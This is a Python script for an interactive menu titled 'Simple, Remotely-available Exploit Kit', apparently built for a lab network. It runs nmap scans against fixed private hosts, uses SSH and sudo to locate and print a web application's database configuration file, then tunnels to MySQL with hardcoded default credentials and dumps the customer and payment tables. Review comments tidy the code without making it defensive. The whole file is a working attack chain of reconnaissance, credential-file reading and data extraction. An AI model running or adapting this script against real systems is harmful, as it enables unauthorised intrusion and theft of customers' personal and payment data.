from consolemenu import *
from consolemenu.items import *
import subprocess
import pymysql
import paramiko
import pandas as pd
import sys
import os
from paramiko import SSHClient
from sshtunnel import SSHTunnelForwarder
from os.path import expanduser
import os
# SSH host used by dbSearch() and as the tunnel endpoint in flushTables().
# All three values are blank in the published file and must be filled in
# before either function can connect.
hostname = username = password = ""

# Commands dbSearch() runs on the SSH host, in order: locate files named
# database* under /var/www, then print one specific YAML file.
# NOTE(review): both run under sudo, so each invocation should appear in the
# target's sudo/auth logging. The file presumably holds the web application's
# database connection settings -- confirm against the target application.
commands = [
    "sudo find /var/www/ -name database*",
    "sudo cat /var/www/html/config/databases.yml",
]

# MySQL endpoint that flushTables() reaches through the SSH tunnel.
# NOTE(review): user, password and schema are the same literal and are kept in
# plaintext in the source; an account whose password equals its name is the
# weakness this script relies on.
sql_hostname = "192.168.92.181"
sql_username = "siwapp"
sql_password = "siwapp"
sql_main_database = "siwapp"
sql_port = 3306

# Absolute directory of this script; the Windows scan wrappers (*.bat) are
# looked up relative to it.
dirname = os.path.split(os.path.abspath(__file__))[0]
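def dbSearch():
    """Run each entry of ``commands`` on the SSH host and print its output.

    Connects with the module-level ``hostname``/``username``/``password``,
    executes the commands one at a time and waits for Enter after each one.
    Terminates the process if the SSH connection cannot be established.
    """
    client = paramiko.SSHClient()
    # NOTE(review): AutoAddPolicy accepts whatever host key the server
    # presents, so the peer is never authenticated and an intercepted
    # connection would go unnoticed. Outside a disposable lab, call
    # client.load_system_host_keys() and keep the default RejectPolicy.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password)
    except Exception:
        # Narrowed from a bare ``except:`` so that Ctrl-C and SystemExit are
        # no longer reported as a connection failure.
        print("[!] Cannot connect to the SSH Server")
        client.close()
        sys.exit()

    try:
        for command in commands:
            print("=" * 50, command, "=" * 50)
            _stdin, stdout, stderr = client.exec_command(command)
            print(stdout.read().decode())
            err = stderr.read().decode()
            # Show stderr before pausing, so a failure is visible next to the
            # command that produced it rather than after the prompt.
            if err:
                print(err)
            input("Press Enter to continue...")
    finally:
        # The original never closed the session; release it even when a
        # command or the prompt raises.
        client.close()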
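def flushTables():
    """Print the table list and the ``customer`` and ``payment`` tables.

    Despite the name, nothing is flushed or modified. The function opens an
    SSH tunnel through ``hostname`` to ``sql_hostname:sql_port``, connects to
    MySQL over the tunnel's local port, runs three read-only statements and
    prints each result, waiting for Enter in between.
    """
    with SSHTunnelForwarder(
        (hostname, 22),
        ssh_username=username,
        ssh_password=password,
        remote_bind_address=(sql_hostname, sql_port),
    ) as tunnel:
        # NOTE(review): the database sees this session as originating from the
        # SSH host rather than from the machine running the script, which is
        # worth keeping in mind when reading the MySQL connection logs.
        conn = pymysql.connect(
            host='127.0.0.1',
            user=sql_username,
            passwd=sql_password,
            db=sql_main_database,
            port=tunnel.local_bind_port,
        )
        statements = [
            '''SHOW TABLES;''',
            '''select * from customer;''',
            '''select * from payment;''',
        ]
        try:
            for statement in statements:
                print("=" * 50, statement, "=" * 50)
                print(pd.read_sql_query(statement, conn))
                input("Press Enter to continue...")
        finally:
            # Close the connection even if a query fails; the original leaked
            # it on any exception raised inside the loop.
            conn.close()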
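def simpleNmapScan():
    """Run the quick nmap service/OS scan against the fixed host list.

    On Windows this delegates to ``simpleNmap.bat`` in the script directory;
    on Linux it prints a separator and invokes ``sudo nmap`` through the
    shell. Any other platform is reported as unsupported.
    """
    # sys.platform is 'darwin' on macOS, and 'darwin' contains 'win': the
    # original substring test sent macOS down the Windows branch. Matching the
    # prefix fixes that ('cygwin' no longer matches the Windows branch either).
    if sys.platform.startswith('win'):
        subprocess.call(os.path.join(dirname, 'simpleNmap.bat'))
    elif sys.platform.startswith('linux'):
        os.system('echo =============================================================================================================================================')
        # Eight fixed addresses probed from a single source in one run.
        os.system('sudo nmap -sV -T4 -O -F --version-light 192.168.93.30 192.168.93.31 192.168.93.37 192.168.93.43 192.168.93.44 192.168.93.45 192.168.93.48 192.168.93.49')
    else:
        print("[!] Unsupported platform:", sys.platform)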
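def aggressiveNmapScan():
    """Run the verbose ``-A`` nmap scan against the fixed host list.

    On Windows this delegates to ``aggressiveNmap.bat`` in the script
    directory; on Linux it prints a separator and invokes ``sudo nmap``
    through the shell. Any other platform is reported as unsupported.
    """
    # sys.platform is 'darwin' on macOS, and 'darwin' contains 'win': the
    # original substring test sent macOS down the Windows branch. Matching the
    # prefix fixes that ('cygwin' no longer matches the Windows branch either).
    if sys.platform.startswith('win'):
        subprocess.call(os.path.join(dirname, 'aggressiveNmap.bat'))
    elif sys.platform.startswith('linux'):
        os.system('echo ==============================================================================================================================')
        # Same eight fixed addresses as the simple scan, with -A and -v.
        os.system('sudo nmap -T4 -A -v 192.168.93.30 192.168.93.31 192.168.93.37 192.168.93.43 192.168.93.44 192.168.93.45 192.168.93.48 192.168.93.49')
    else:
        print("[!] Unsupported platform:", sys.platform)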
def main():
    """Build the four-entry console menu and hand control to it."""
    menu = ConsoleMenu(
        "Simple, Remotely-available Exploit Kit", "The answer is 42...")

    # (label, callback) pairs in display order; each becomes a FunctionItem,
    # which calls its function when the entry is selected.
    entries = (
        ("Run a simple NMAP Scan", simpleNmapScan),
        ("Run a aggressive NMAP Scan", aggressiveNmapScan),
        ("Search for Database Files", dbSearch),
        ("Connect to and search DB", flushTables),
    )
    for label, action in entries:
        menu.append_item(FunctionItem(label, action))

    # show() displays the menu and lets the user interact with it.
    menu.show()
# Start the menu only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()